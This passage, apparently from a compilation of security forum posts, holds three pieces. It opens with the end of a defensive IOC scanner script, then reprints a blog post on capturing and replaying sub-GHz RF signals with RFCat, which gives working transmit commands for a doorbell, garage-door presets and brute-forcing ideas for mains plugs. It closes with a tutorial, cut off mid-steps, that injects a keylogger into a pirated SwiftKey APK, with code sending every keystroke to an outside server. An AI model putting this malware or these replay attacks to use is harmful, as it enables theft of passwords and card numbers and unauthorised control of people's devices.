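    wanted = {normalize_md5(h) for h in ioc_hashes}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = md5_file(path)
            except OSError:
                continue
            if digest in wanted:
                hits.append((path, "md5:" + digest))
                continue
            # String scan only for files small enough to read whole.
            if os.path.getsize(path) <= max_string_scan:
                with open(path, "rb") as f:
                    data = f.read()
                for s in ioc_strings:
                    if s in data:
                        hits.append((path, "string:" + s.decode()))
                        break
    return hits


def demo():
    """Build a constructed tree with one hash match and one string match."""
    root = tempfile.mkdtemp(prefix="ioc_demo_")
    try:
        os.makedirs(os.path.join(root, "tools"))
        sample = os.path.join(root, "tools", "dump.exe")  # constructed, not a real binary
        with open(sample, "wb") as f:
            f.write(b"constructed sample, not a real binary\n")
        with open(os.path.join(root, "tools", "srv.exe"), "wb") as f:
            f.write(b"MZ....ZXHttpServer....")  # constructed string hit
        with open(os.path.join(root, "readme.txt"), "wb") as f:
            f.write(b"nothing to see here\n")
        # Add the sample's own hash (upper-case, to exercise normalisation).
        hashes = IOC_MD5_RAW + [md5_file(sample).upper()]
        hits = scan_tree(root, hashes, IOC_STRINGS)
        return sorted(reason for _path, reason in hits)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Point scan_tree() at a real root with the full table's hashes to sweep a host; as the post warns, a one-byte change defeats the MD5 match, so the string indicators and filename oddities matter as much as the digests.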
  21. [h=3]You can ring my bell! Adventures in sub-GHz RF land...[/h]

Dammit! Now that song is stuck in my head and will be going around and around for the next three days... Thanks, ! (and apologies if it's now stuck in yours too!) But she's right: you can ring my bell. And I can ring yours. And hers. What the hell - let's just all ring each other's bells shall we? And dim your lights. And open your garage door. And let's do it from the comfort and safety of my car, whilst driving around...

Speaking of hell, what the hell am I talking about???

A little while ago I got involved in a project that needed some hardware security testing. It was a complex system that used just about every protocol under the sun, including RF. Now RF, like other 'invisible' transport mechanisms, always gets me interested because, in my experience, once data becomes invisible, something magical happens: they forget about security. Nobody can see what's going on, so we don't need to worry about it, right? Wrong. Time and time again I've seen this... MagStripes, InfraRed, RFID, Bluetooth, Magic Moon Beams. You name it, they'll send data over it insecurely.

In this case the RF was mostly standard stuff like WiFi and Zigbee, but there was also something going on in the 400MHz band, so how to take a look at what was there? The obvious answer is to use an SDR (Software Defined Radio), and from previous projects I have a USRP which fits the bill. However, as I travel a lot, I prefer something a little more portable, so I'm always on the lookout for smaller alternatives. As it happens, a friend gave me a nice Christmas gift (thanks CJ!) of a FunCube dongle:

This very cool device can receive on any frequency from 64MHz to 1.7GHz and fits in my laptop bag so is absolutely ideal. It also presents itself to the PC as a pseudo sound card, so is very easy to interface to.
This was a fantastic bonus for me as I'm already comfortable with the idea of converting audio into data and have used the soundcard in my laptop for that purpose on many previous projects (e.g. magstripes). Radio is, almost by definition, very mysterious. You can't see it and you can't hear it, so using a soundcard is actually a very good shortcut to helping understand this completely unknown source of data. It's not intuitively obvious that it should be that way, but the human brain is very good at recognising patterns, and the soundcard not only provides us with auditory data that our ears will immediately be able to latch onto, but also visual data in the form of an editable wave file. The bottom line is that I don't understand how radio works, and I don't particularly want to - all I want is to be able to capture whatever's being sent over it and convert into something I can deal with - i.e. bits and bytes. So how to do that? The first task is to determine exactly what frequency our signal is on. There are several ways of doing this, and the simplest is to make a rough guess and just take a listen. If you're anywhere close you'll hear something when you activate the device, and you can then tune up or down until you've found the centre frequency and you're getting nice crisp clean signals. This is particularly important when trying to convert mysterious airy-fairy analogue signals back into nice reliable 0s and 1s, as any deviation can end up corrupting your data beyond all recognition. Another way is to use a spectrum analyser. This is essentially another type of RF receiver, that listens on a very wide band and shows you any spikes or other discrepancies, one of which will be the signal you're looking for. This can be in the form of software using the FunCube itself, such as HDSDR (Windows) or QUISK (Linux), or a standalone hardware device like the RF Explorer. I actually use both. 
The RF Explorer to quickly find the signal, and then QUISK or HDSDR to fine tune.

So getting back to our examination, I can't talk about the actual device in question, but since I have a wireless doorbell, let's take a look at that instead... Like most such devices, it helpfully tells you what frequency it's using on its R&TTE approval label. In this case, 433.92 MHz. Putting that into HDSDR and hitting the button produces a nice 'hot' line right on the centre (the white and orange blob in the top window), so it looks like we're in the money...

We can also hear what is obviously data. OK, so now what? How do we get it from the sound card into nice friendly binary data? Although we've decided against using the USRP, its companion software, GNU Radio, is the obvious choice. It has a great helper tool called GNU Radio Companion which makes this kind of task an absolute doddle. There is a plugin for the FunCube which is now bundled with the main GNU Radio distribution, so no extra work is required to get it up and running. Firing it up, we can build a simple setup that connects our funcube to our speakers:

and again, if we run it, we get some nice 'data' sounding output... So we can hear it, and it sounds like data, but we still can't do anything useful with it. Saving it to a wavefile is just as easy:

and now this is where the fun begins. We can edit that file with any audio editor. I used Audacity but pretty much anything will do. We can clearly see our data bursts, and if we zoom in:

we can see some proper structure to it. This not only sounds like data but it looks like it too. What we appear to have is long pulses and short pulses, so we can imagine they may represent 0s and 1s just as they are - maybe a short pulse is a 0 and a long a 1...

Now I know I said I wasn't interested in understanding radio, but there is one little thing that will help to convert our data from its current analogue form into proper digital, and that's modulation.
There are many modulation schemes out there, but the two you're most likely to encounter at this level are FM (Frequency Modulation) and AM (Amplitude Modulation). FM is normally used for things that need reasonably high fidelity, like speech or music, but AM, although it can also be used for speech and music, is perfectly suited to binary data as all it needs to be is either 'ON' or 'OFF'. This is also known as OOK, or On-Off Keying, and as we can see from our sample, this is clearly what we are dealing with here. We have a flat line when we're 'OFF', which then becomes wavy when we're 'ON'. Now we know we're dealing with AM, we can get GNU Radio to do one more job for us: demodulate the AM signal. And our signal now looks like this: Now, instead of bursts of wavy stuff, it's pretty much a straight line that goes high or low which is very clearly binary data. We have long pulses and short pulses, and the whole sample is simply this short pattern repeating. If we assume the short pulse represents a 0 and the long a 1, this decodes as: 0100000011110 Add some leading zeros to bring it up to a multiple of eight bits and we get 00001000 00011110, which is 08 1E in hex. Of course it may actually be interpreted differently - the 0 and 1 may be the other way around, and the bit order may be reversed, but for our purposes, at this stage, it really doesn't matter as long as it makes some kind of sense. Great, so now what? I know my doorbell push-button is spitting out '081E', so therefore the bell itself must be listening for '081E' and ringing when it hears it. My neighbour's bell-push won't set it off as it's presumably sending out a different number. But how to test this? Ideally, I'd like to transmit my own signal, from something other than the bell-push, and if the bell rings I know I've got it right. Unfortunately, as cool as it is, the Fun Cube is just a receiver, so we need something that can transmit as well... 
The easy option would be to go back to the USRP, but I've already discounted that as it won't fit in my laptop bag and I'd like to be able to do this on the move...

As I mentioned, the original device we were looking at was also using WiFi and Zigbee, so we were using an Ubertooth 2.4GHz dongle to poke around with that. I knew there were chips in the same device range that did sub-GHz frequencies, so I asked Mike Ossmann, the Ubertooth's designer, if he knew of any projects utilising these. I was in luck: he did. Not only had he got some research of his own, but he pointed me at RFCat, a new project (at the time) designed to do exactly this kind of thing. Perfect! Not only would I be able to receive the signals from the bell-push, but I should be able to emulate them as well.

RFCat is based around a Texas Instruments SoC (System on Chip) called the CC1111. These are really very cool devices, which provide microprocessor and built-in RF transceiver all in one package. This one even has an AES capable crypto co-processor and built-in USB, so it is the ideal platform for this kind of tomfoolery... Development kits in 433, 868 and 915 MHz bands are available off the shelf, and come in two forms: either as a standalone USB dongle (868/915 only):

or these nifty wristwatches:

RFCat is a replacement firmware package for the USB dongle part of the kit, and allows low level access to the radio functions via a simple USB command interface. Oh, and it's in Python. Joy!

So one impatient wait for an overnight delivery later I'm in business and I've got my RFCat dongle up and running. It has a nice object oriented interface, so all you need to do is create an instance and start doing stuff with it (my commands are in bold)...

$ rfcat -r
'RfCat, the greatest thing since Frequency Hopping!'

Research Mode: enjoy the raw power of rflib

currently your environment has an object called "d" for dongle.
this is how you interact with the rfcat dongle:
>>> d.ping()
>>> d.setFreq(433000000)
>>> d.setMdmModulation(MOD_ASK_OOK)
>>> d.makePktFLEN(250)
>>> d.RFxmit("HALLO")
>>> d.RFrecv()
>>> print d.reprRadioConfig()

Python 2.7.2+ (default, Jul 20 2012, 22:15:08)
Type "copyright", "credits" or "license" for more information.

IPython 0.10.2 -- An enhanced Interactive Python.
? -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help -> Python's own help system.
object? -> Details about 'object'. ?object also works, ?? prints more.

In [1]: d.ping()
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002653 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002528 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004721 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004821 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004573 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002605 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002430 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002678 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002519 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002820 seconds)
Out[1]: (10, 0, 0.0331571102142334)

In [2]: d.setFreq(433920000)

In [3]: d.RFxmit('\x08\x1E')

In [4]:

At this point, not surprisingly, my doorbell didn't ring. This is because our interpretation of the data, giving us HEX 081E, is a little bit simplistic. The RFCat dongle doesn't understand that we want to represent a 0 as a short pulse and a 1 as a long, so we have to do a bit more work to get it into a format that RFCat can deal with...
A traditional microprocessor controlled radio circuit would typically have a separate circuit or daughterboard for the radio portion, and the microprocessor would signal the data it wanted to send by toggling a pin HIGH/LOW. The microprocessor would be entirely responsible for making sure that the timing was correct - i.e. that it held the pin HIGH for as long as it wanted the RF to be 'ON', and LOW for the duration of the 'OFF' period. However, in these SoC devices, the radio part is all done for you and you simply need to tell it what modulation scheme you want, speed of transmission etc., feed it some data and it will do the rest.

As we already know the modulation scheme (AM/OOK), that bit's easy, so now we just have to think of our original signal in terms of OOK, and what our data would need to look like to produce the same signal. Looking at the original trace, it's pretty 'readable', but if we want to really tidy it up we can turn it into a square wave and this will make visual checking of bit lengths much easier and more accurate. Since a .wav file is just a header with a bunch of values for each sample, it's really easy to manipulate. In this case we want to take any value that is below 0 and set it to absolute minimum, and anything above 0 we set to maximum, which is effectively what the original source was doing before the signal got converted and sent over RF - a 0 was a pin going LOW and a 1 was a pin going HIGH...

Accordingly, I wrote a little command line tool for tweaking wav files:

$ wav-cli.py /tmp/test1.wav square 0 out /tmp/ts.wav
Converting to square wave
Writing /tmp/ts.wav

and this is the result:

Now we can accurately convert the signal into true OOK binary. We take the smallest element as our single binary digit, and then represent the data with a 1 when we want the line to go high, and 0 when we want it to go low, taking into account the size of our pulse compared to the single binary digit.
In this case we only have two different size pulses - short and long, so we can represent them with a single or double digit:

Again, we need to add some leading or trailing 0s to give ourselves an 8-bit multiple, so the final number we end up with is 00101100 10010010 01001001 01101101 10110010, or 2C 92 49 6D B2 in HEX. Since it's always the same, we don't really need to understand what this message 'means', only to be able to reproduce it.

So in theory, if I set up RFCat to work in OOK mode with the correct speed and modulation, I should be able to transmit 2C92496DB2 and my doorbell should ring (the speed I get by measuring a short pulse width in seconds)...

In [1]: d.setFreq(433920000)
In [2]: d.setMdmDRate(int(1.0/0.000302))
In [3]: d.setMdmModulation(MOD_ASK_OOK)
In [4]: d.RFxmit('\x2C\x92\x49\x6D\xB2')

Hmm.... Nothing. However, my bell-push didn't just transmit the message once, it sent it dozens of times, so maybe I need to do the same:

In [5]: d.RFxmit('\x2C\x92\x49\x6D\xB2' * 60)

Nope, still nothing. Going back to my original trace I could see there was a gap between each data pulse, which we can easily simulate by adding some extra '0' bits, so:

In [6]: d.RFxmit('\x2C\x92\x49\x6D\xB2\x00\x00\x00' * 60)

Bingo! The doorbell rings and my dogs go crazy telling me there's someone at the door! Nice!!!

Well, this is very cool and all, but it's not very, erm... Bond, is it? I mean, Daniel Craig isn't going to get the girl, save the world and keep Dame Judi happy by saying... "Hang on Bad Guys, I've just got to get my laptop out... plug in this USB dongle... nearly got it... just a tick... Ouch, that hurt!" No. Not really. What we need is something much cooler, sexier, and, well.... shiny! Something Gucci that's always right there, ready to go at a moment's notice...

But wait! What's that in the box of bits that came with my dev kit? A wristwatch? With a frikkin' transmitter built into it???? OK.... now that's what I'm talkin' 'bout! Come to Papa...
And so, I give you the latest thing from my local toy store... It's called "radio":

[h=2]Chronos Integrated Commander[/h]

Or ChronIC for short... It's basically a cut-down RFCat-like firmware package that allows you to use the watch to transmit arbitrary signals. You can set it up either from the watch itself, or via the original Chronos dongle with a python helper, and then the up/down buttons on the right of the watch do the transmitting. The python helper looks like this:

$ chronic-cli.py
Usage: /usr/local/bin/chronic-cli.py <COMMAND> [ARG(s)] ... [<COMMAND> [ARG(s)] ... ]

Commands:

BAUD <RATE>                Set RF modem baudrate
BYRON                      Configure for Byron doorbell emulation
DELAY <0-255>              Delay in MS between each DATA transmission
DOWN <HEX> <HEX> <HEX>     Set DATA for DOWN button - 3 * 63 bytes
EXIT                       Force sync mode EXIT on Chronos
FREQ <FREQUENCY>           Set Frequency (e.g. 433920000)
FRIEDLAND                  Configure for Friedland doorbell emulation
MAN <'ON'|'OFF'>           Set Manchester Encoding
MOD <FSK|GFSK|OOK|MSK>     Modulation:
                             FSK  - Frequency Shift Keying
                             GFSK - Gaussian Frequency Shift Keying
                             OOK  - On-Off Keying (in ASK mode)
                             MSK  - Multiple Frequency Shift Keying
REPEAT <0-255>             Number of times to repeat DATA when button pressed
RUKU                       Configure for Ruku garage door emulation
SERIAL <BAUD>              Set access point comms baudrate (default 115200)
PULSE <WIDTH>              Set pulsewidth (baud rate = 1.0/pulsewidth)
TIME                       Synchronise time/date
UP <HEX> <HEX> <HEX>       Set DATA for UP button - 3 * 63 bytes

Commands will be executed sequentially and must be combined as appropriate.
It is recommended to finish with an EXIT to help conserve battery.

Full instructions are in the README in the github repo, but here is an example of setting it up to ring my doorbell.
Put the watch in 'SYNC' mode, and then:

$ chronic-cli.py freq 433920000 man off delay 0 repeat 60 pulse 0.000320 up 2C92496DB2000000 '' '' down 2C92496DB2000000 '' '' exit
Setting Frequency: 433920000 (OK)
Setting Manchester Encoding: OFF (OK)
Setting delay: 0 (OK)
Setting repeat: 60 (OK)
Setting pulsewidth: 0.00032 (3124.237061 Hz) (OK)
Setting UP Button: (OK)
Setting DOWN Button: (OK)
Sending EXIT command

Or you can take the shortcut:

$ chronic-cli.py byron
Setting up for Byron Doorbell
Setting Frequency: 433920000
Setting Manchester Encoding: OFF
Setting Delay: 0
Setting Repeat: 60
Setting PulseWidth: 0.000320 (3124.237061 Hz)
Setting UP button: 2C92496DB2000000
Setting DOWN button: 2C92496DB2000000

And there are plenty of other targets... Discussions on the gnuradio mailing list back in 2006 show that the obvious one of a car key was being looked at. Matt Ettus says:

"After the Wired article today, I've received a couple of emails from people who are concerned that the USRP could be used to clone their keyfob transmitters for car alarms and garage doors. I'm not concerned, since there are already many ways to do this (just check the back of popular science magazine). However, I am curious about it. I know that we can capture and play back any rf signal. The question is whether that replayed signal would result in the door being unlocked. I was under the impression that most of those systems allow an unlock code to only be used once, but does anyone out there know for sure?"

Well, here's your answer:

Unlocking and re-locking my son's Beemer:

And the wife's Disco (note the pause and the second set of 'clunks' - this is because the first command only opens the driver's door, but because we have the option to send multiple sequences we can send another open command which then opens the rest of the doors):

Of course, opening car doors is a nice party trick, but because modern vehicles are secured by rolling codes, that's all it is - a party trick.
You'll be able to do this once and once only with each 'hacked' sequence...

What's of more concern to me are devices like the 'Owl Plug':

These handy little devices allow you to control mains voltage appliances via RF. Clearly, this could have serious consequences if care is not taken when switching things on and off. What if it's an electric heater and it got shoved into a corner to vacuum the room? It gets switched back on and bingo, the curtains are on fire! Let's hope they've made the protocol nice and secure then!

Oh, dear. No rolling code. Same bit sequence every time:

And the only difference between the five buttons on the remote is a few bits. I suspect, therefore, that the only difference between my remote and my neighbour’s will also only be a few bits, so it's probably not much of an exercise to figure out which ones I need to brute force to be able to go around switching things on and off at random (I've ordered another one and will check, so watch this space...).

As usual, the code is available on the Aperture Labs tools page, but please bear in mind that while playing with your own RF devices is perfectly OK in any reasonable society, playing with other people's (without their permission) is most definitely not (and probably illegal)! Behave!

Posted by Adam "Major Malfunction" Laurie at 03:55

Source: Obviously a Major Malfunction...: You can ring my bell! Adventures in sub-GHz RF land...
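The difference the post draws between the Owl Plug (same bits every press) and a car remote (rolling code) comes down to what the receiver will accept twice. The following is an added toy model, not the post's code and not any manufacturer's scheme: a fixed-code receiver accepts a captured frame again and again, while a counter-plus-HMAC receiver accepts a given frame once and then refuses it. Frame layout, key and sample values are constructed for the example.

```python
import hashlib
import hmac


class FixedCodeReceiver:
    """Owl-plug style receiver: the button always sends the same bits,
    so the receiver can only compare against one expected frame."""

    def __init__(self, expected_frame: bytes):
        self.expected = expected_frame

    def accept(self, frame: bytes) -> bool:
        return hmac.compare_digest(frame, self.expected)


class RollingCodeRemote:
    """Constructed rolling-code remote: each press sends a 4-byte counter
    followed by an 8-byte HMAC tag over that counter (shared key)."""

    def __init__(self, key: bytes):
        self.key = key
        self.counter = 0

    def press(self) -> bytes:
        self.counter += 1
        ctr = self.counter.to_bytes(4, "big")
        tag = hmac.new(self.key, ctr, hashlib.sha256).digest()[:8]
        return ctr + tag


class RollingCodeReceiver:
    """Accepts a frame only if its counter is above the last accepted one
    (within a resync window) and its tag verifies under the shared key."""

    def __init__(self, key: bytes, window: int = 16):
        self.key = key
        self.window = window
        self.last_counter = -1

    def accept(self, frame: bytes) -> bool:
        counter = int.from_bytes(frame[:4], "big")
        tag = frame[4:12]
        # A counter at or below the last accepted value is a replay; one far
        # beyond the window is out of sync. Both are rejected.
        if counter <= self.last_counter or counter > self.last_counter + self.window:
            return False
        expected = hmac.new(self.key, frame[:4], hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(tag, expected):
            return False
        self.last_counter = counter
        return True


def replay_results():
    """Capture one legitimate frame from each kind of remote and replay it.
    Returns (fixed_replay_ok, rolling_first_ok, rolling_replay_ok)."""
    fixed_frame = bytes.fromhex("a5a5a5a5")  # constructed sample payload
    fixed_rx = FixedCodeReceiver(fixed_frame)
    fixed_rx.accept(fixed_frame)                 # legitimate press
    fixed_replay = fixed_rx.accept(fixed_frame)  # captured frame replayed: still works

    key = b"constructed-shared-key"
    remote = RollingCodeRemote(key)
    rolling_rx = RollingCodeReceiver(key)
    captured = remote.press()
    first = rolling_rx.accept(captured)          # works once
    replay = rolling_rx.accept(captured)         # same frame again: rejected
    return fixed_replay, first, replay
```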
  22. [h=1]Inserting keylogger code in Android SwiftKey using apktool[/h]

Piracy on Android is a very big problem, but I wonder do users realise how easy it is to inadvertently download apps with malware. Cracked copies of PC and iPhone apps can have malware as well of course, but on both those platforms most software is compiled to machine code. Android apps are coded in Java and compiled to byte code that is run on the Dalvik VM, and this byte code is not that hard to edit and insert back into an APK.

SwiftKey Keyboard is the top paid app in the Play store at the moment and it’s a great app, best €4 I spent, but I knew it’d be heavily pirated at that price. Now your standard malware-ridden Android app or game might have some code that sends you annoying notification ads, but anyone who sideloads a dodgy copy of an Android keyboard is taking a serious risk of a keylogger being inserted and people tracking all their passwords, Google searches and credit card numbers.

In this post, I’ll show you how to do exactly that with apktool and SwiftKey from start to finish; all you need is a basic knowledge of Java and Android. The end result is this Keylogger SwiftKey APK that sends all keylogs to my server. Try it out for yourself: download and install the modified APK, start using it and visit my logger page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php, select your IP and see your keylogs being sent. Scary huh? Goes without saying, be sure to uninstall the app when you see how it works! Continue reading below to see how to do it.

[h=2]SwiftKey APK[/h]

First you’ve got to understand the Android file format that SwiftKey and all other Android apps are in. The Android package, or APK, is the container for an Android app’s resources and executables.
It’s a zipped file that for SwiftKey contains simply:

AndroidManifest.xml (serialized, but apktool decodes to source)
classes.dex
lib/
assets/
res/
META-INF/

The actual bytecode of the application is the classes.dex file, or the Dalvik executable that runs on the device. The application’s resources (i.e. images, sound files) reside in the res directory, and the AndroidManifest.xml is more or less the link between the two, providing some additional information about the application to the OS. The lib directory contains native libraries that SwiftKey uses via the NDK, and the META-INF directory contains information regarding the application’s signature.

[h=2]The Tools[/h]

There are a few different tools out there to decompile, compile and resign APKs. All the decompilers are based on or use smali to decompile/compile the classes.dex file. apktool wraps up a few of these tools in one, but you still have to re-sign and then install on a device. So then there’s APK multitool, which wraps apktool, keytool and other things to let you press one button and have your edited code compiled, zipped, signed and installed to your device via adb all in one go. So download that and set it up, but remember it’s just a collection of other tools.

[h=2]Disassembling SwiftKey[/h]

Once you’ve installed APK multitool, you’d normally place your APK in the ‘place-apk-here-for-modding’ folder, open up Script.bat and enter 9 to decompile source and resources. Unfortunately SwiftKey throws errors when you try to recompile resources, as it has capitalised resource filenames and was probably compiled with a modified aapt. We call these magick APKs, and apktool can’t recompile edited resources, but we can still compile edited smali code, which is all we want to make our keylogger anyway. So enter 27 to change the decompile mode to ‘Source Files only’, then enter 9 to decompile.
If nothing goes wrong, there’ll be a folder created inside projects called ‘com.touchtype.swiftkey-1.apk’ containing:

AndroidManifest.xml (still serialized, remember we didn’t decompile resources)
res/ (same as in APK)
smali/
apktool.yml

The smali directory is probably the most important of the three, as it contains a set of smali files, or bytecode representation of the application’s dex file. You can think of it as an intermediate file between the .java and the executable. Inside the directory we have ‘com’, ‘oauth’ and ‘org’. We’re looking for code where we can place our keylogger, so we can ignore oauth as that’s obviously a library for oauth access. org contains some Apache Commons library so that can be ignored as well. Inside com, the android and google directories are to be ignored as well; it’s the touchtype and touchtype_fluency directories that we’re interested in.

I’ve done the hard work already and found what we’re looking for in the ‘touchtype\keyboard\inputeventmodel\events’ directory. Go there and open up KeyInputEvent.smali in a text editor. We’re very lucky that SwiftKey isn’t ProGuard protected, which obfuscates code and really slows down reverse engineering but never makes it impossible.
[h=2]Reading the Smali[/h]

So let’s examine some of the KeyInputEvent smali code:

.class public abstract Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent;
.super Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;
.source "KeyInputEvent.java"

# direct methods
.method public constructor <init>(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V
    .locals 0
    .parameter "extractedText"
    .parameter "inputText"

    .prologue
    .line 8
    invoke-direct {p0, p1, p2}, Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;-><init>(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V

    .line 9
    return-void
.end method

This class seems to be called whenever the user makes a single keypress in SwiftKey, but not when using Flow. The constructor is what we’re looking at and is called with 2 parameters: an instance of a ‘com/touchtype_fluency/service/TouchTypeExtractedText’ class and a CharSequence which is the key pressed. We want to send this key to our servers, so we need to insert the code here. If you’re a smali expert you can code it directly and compile, but we’re not, so we’ll code some in Java first, decompile and copy the smali over. We also want to send it in an AsyncTask as the keyboard is way too slow without it.
This is my Java code which we’ll call MainActivity.java, part of a package called ‘com.androidapps.tutorial’:

package com.androidapps.tutorial;

import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;

import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.StatusLine;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

import android.app.Activity;
import android.os.AsyncTask;
import android.os.Bundle;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        CharSequence cs = "Hi how are u";
        HashMap<String, String> data = new HashMap<String, String>();
        data.put("data", cs.toString());
        AsyncHttpPost asyncHttpPost = new AsyncHttpPost(data);
        asyncHttpPost.execute("http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php");
    }

    public class AsyncHttpPost extends AsyncTask<String, String, String> {
        private HashMap<String, String> mData = null; // post data

        /**
         * constructor
         */
        public AsyncHttpPost(HashMap<String, String> data) {
            mData = data;
        }

        /**
         * background
         */
        @Override
        protected String doInBackground(String... params) {
            byte[] result = null;
            String str = "";
            HttpClient client = new DefaultHttpClient();
            HttpPost post = new HttpPost(params[0]); // in this case, params[0] is URL
            try {
                // set up post data (typed collections so it.next() yields a String)
                ArrayList<NameValuePair> nameValuePair = new ArrayList<NameValuePair>();
                Iterator<String> it = mData.keySet().iterator();
                while (it.hasNext()) {
                    String key = it.next();
                    nameValuePair.add(new BasicNameValuePair(key, mData.get(key)));
                }
                post.setEntity(new UrlEncodedFormEntity(nameValuePair, "UTF-8"));
                HttpResponse response = client.execute(post);
                StatusLine statusLine = response.getStatusLine();
                if (statusLine.getStatusCode() == HttpURLConnection.HTTP_OK) {
                    result = EntityUtils.toByteArray(response.getEntity());
                    str = new String(result, "UTF-8");
                }
            } catch (UnsupportedEncodingException e) {
                e.printStackTrace();
            } catch (Exception e) {
            }
            return str;
        }

        /**
         * on getting result
         */
        @Override
        protected void onPostExecute(String result) {
            // something...
        }
    }
}

When we export this from Eclipse as an APK, decompile and look at the directory, we find 2 files, MainActivity.smali and MainActivity$AsyncHttpPost.smali. The ‘$’ in the filename means it’s the AsyncHttpPost inner class.
Let’s look at the onCreate of MainActivity:

MainActivity.smali

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 6
    .parameter "savedInstanceState"

    .prologue
    .line 146
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    .line 149
    const-string v1, "Hi how are u"

    .line 150
    .local v1, cs:Ljava/lang/CharSequence;
    new-instance v2, Ljava/util/HashMap;

    invoke-direct {v2}, Ljava/util/HashMap;-><init>()V

    .line 151
    .local v2, data:Ljava/util/HashMap;,"Ljava/util/HashMap<Ljava/lang/String;Ljava/lang/String;>;"
    const-string v3, "data"

    invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v2, v3, v4}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;

    .line 152
    new-instance v0, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;

    invoke-direct {v0, p0, v2}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;-><init>(Lcom/androidapps/tutorial/MainActivity;Ljava/util/HashMap;)V

    .line 153
    .local v0, asyncHttpPost:Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;
    const/4 v3, 0x1

    new-array v3, v3, [Ljava/lang/String;

    const/4 v4, 0x0

    const-string v5, "http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php"

    aput-object v5, v3, v4

    invoke-virtual {v0, v3}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;

    .line 158
    return-void
.end method

So we’d better explain some of this code. The first line is the smali method definition of onCreate, with the Bundle parameter passed in and the return type at the end, which is V for void. Java primitives are denoted by a single letter and can be missed sometimes, so keep an eye out for them.

V  void
Z  boolean
B  byte
S  short
C  char
I  int
J  long (64 bits)
F  float
D  double (64 bits)

The next line is very important for us: it declares how many local registers are to be used in this method, not including registers allocated to the parameters of the method.
The number of parameter registers for any given method will always be the number of input parameters + 1. This is due to an implicit reference to the current object that resides in parameter register 0 or p0 (in Java this is called the “this” reference). The registers are essentially references, and can point to both primitive data types and Java objects. Given 6 local registers, 1 parameter register, and 1 “this” reference, the onCreate() method uses an effective 8 registers.

For convenience, smali uses a ‘v’ and ‘p’ naming convention for local vs. parameter registers. Essentially, parameter (p) registers can be represented by local (v) registers and will always reside in the highest available registers. For this example, onCreate() has 6 local registers and 2 parameter registers, so the naming scheme will look something like this:

v0 - local 0
v1 - local 1
v2 - local 2
v3 - local 3
v4 - local 4
v5 - local 5
v6/p0 - local 6 or parameter 0 (this)
v7/p1 - local 7 or parameter 1 (android/os/Bundle)

[h=2]Opcodes[/h]

Dalvik opcodes are relatively straightforward, but there are a lot of them. For the sake of this post’s length, we’ll only go over a few of the most commonly used opcodes.

invoke-super vx, vy, …   invokes the parent class's method in object vx, passing in parameter(s) vy, …
new-instance vx          creates a new object instance and places its reference in vx
invoke-direct vx, vy, …  invokes a method in object vx with parameters vy, … without the virtual method resolution
const-string vx          creates a string constant and passes its reference into vx
invoke-virtual vx, vy, … invokes the virtual method in object vx, passing in parameters vy, …
return-void              returns void

[h=2]Hacking the App[/h]

Now that I’ve explained a bit of what the code means, let’s inject it into the KeyInput file of SwiftKey.
Note in our exported smali from MainActivity that it references the ‘com/androidapps/tutorial’ package, so we need to change that to the package where KeyInput is, which is ‘com/touchtype/keyboard/inputeventmodel/events/’. So open up both MainActivity.smali and MainActivity$AsyncHttpPost and do a search and replace changing ‘com/androidapps/tutorial/MainActivity’ to ‘com/touchtype/keyboard/inputeventmodel/events/KeyInputEvent’.

Next we have to ensure we have the right number of registers in the SwiftKey KeyInputEvent to support our new method calls. We can see that the original constructor uses no local variables and our MainActivity uses 6, so just set .locals 0 to .locals 6. Then copy our new code in, just before the return-void of the constructor.

